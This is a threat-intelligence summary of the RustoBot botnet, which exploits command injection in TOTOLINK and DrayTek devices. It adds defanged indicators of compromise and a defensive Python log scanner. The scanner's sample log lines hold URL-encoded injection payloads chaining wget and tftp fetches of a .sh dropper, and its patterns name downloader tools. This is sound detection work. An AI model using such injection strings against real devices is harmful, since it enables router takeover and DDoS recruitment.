This article discusses the emergence of a new botnet named “RustoBot” that targets vulnerabilities in various TOTOLINK and DrayTek devices. Written in Rust, it exploits command injection vulnerabilities to gain remote control over these systems. The attacks, identified by FortiGuard Labs, specifically affected technology industries in multiple countries. Affected: TOTOLINK devices, DrayTek devices, technology industry
Key points:
- FortiGuard Labs discovered “RustoBot,” a new Rust-based botnet targeting TOTOLINK devices.
- The malware exploits command injection vulnerabilities in the cstecgi.cgi file of TOTOLINK devices.
- Multiple versions of TOTOLINK devices and specific DrayTek devices are affected.
- The botnet distributes malware through various downloader scripts.
- RustoBot can execute DDoS attacks using multiple protocols.
- Incidents were reported in Japan, Taiwan, Vietnam, and Mexico.
- The botnet uses DNS-over-HTTPS for masking its traffic.
- FortiGuard provides antivirus and IPS signatures to protect against the exploits.
MITRE Techniques:
- Command-Line Interface (T1059.001): Leveraged for executing scripts using wget and tftp commands to install RustoBot.
- Exploitation of Remote Services (T1210): Exploits the vulnerabilities in TOTOLINK devices for remote code execution.
- Application Layer Protocol (T1071): Uses DNS-over-HTTPS to obfuscate malicious traffic.
- DDoS: Launches DDoS attacks via UDP, raw IP, and TCP protocols.
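The key points above describe the two observable stages of the infection: a command injection against cstecgi.cgi, followed by a wget/tftp fetch of a downloader script. The following detection sketch is an added example, not code from the FortiGuard report; it scans web-server access logs in Common Log Format for those two signals. All log lines, parameter names and IP addresses in it are constructed (RFC 5737 ranges) and are not real indicators.

```python
"""Flag RustoBot-style command-injection attempts against cstecgi.cgi in access logs.
Added defender example; sample data is constructed, not taken from a real device."""
import re
from urllib.parse import unquote_plus

# Common Log Format: client - - [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Shell metacharacters / command substitution that never belong in a router CGI parameter
SHELL_META = re.compile(r'[;|&`]|\$\(')
# Downloader stage the report describes: wget or tftp fetching a .sh dropper
DOWNLOADER = re.compile(r'\b(wget|tftp|curl)\b.*\.sh\b', re.IGNORECASE)

def classify(line):
    """Return the reasons a request looks like an injection attempt, or [] if benign."""
    m = LOG_RE.match(line)
    if not m:
        return []
    target = unquote_plus(m.group("target"))        # decode %3B, %20 etc. before matching
    path, _, query = target.partition("?")
    if "cstecgi.cgi" not in path:
        return []
    reasons = []
    if SHELL_META.search(query):
        reasons.append("shell metacharacters in cstecgi.cgi parameters")
    if DOWNLOADER.search(query):
        reasons.append("downloader command (wget/tftp) referencing a .sh script")
    return reasons

def scan(lines):
    """Map each offending source IP to the reasons its requests were flagged."""
    hits = {}
    for line in lines:
        reasons = classify(line)
        if reasons:
            hits.setdefault(LOG_RE.match(line).group("src"), []).extend(reasons)
    return hits

# Constructed sample log lines; 'param' is a placeholder, not a real cstecgi.cgi parameter
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2025:10:00:01 +0000] "GET /cgi-bin/cstecgi.cgi?action=login HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Apr/2025:10:00:02 +0000] "POST /cgi-bin/cstecgi.cgi?param=x%3Bwget%20http%3A%2F%2F203.0.113.5%2Fw.sh HTTP/1.1" 200 12',
    '198.51.100.7 - - [01/Apr/2025:10:00:03 +0000] "POST /cgi-bin/cstecgi.cgi?param=x%7C%7Ctftp%20203.0.113.5 HTTP/1.1" 200 12',
    '192.0.2.11 - - [01/Apr/2025:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for src, reasons in scan(SAMPLE_LOG).items():
        print(src, "->", "; ".join(sorted(set(reasons))))
```

Only requests whose path is cstecgi.cgi are inspected, so ordinary traffic to the same device is not flagged; the decoded query is what is matched, since exploit attempts arrive URL-encoded.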
Indicators of Compromise:
- [URL] hxxp://66[.]63[.]187[.]69/w.sh
- [URL] hxxp://66[.]63[.]187[.]69/wget.sh
- [URL] hxxp://66[.]63[.]187[.]69/tftp.sh
- [Host] dvrhelper[.]anondns[.]net
- [IP Address] 5[.]255[.]125[.]150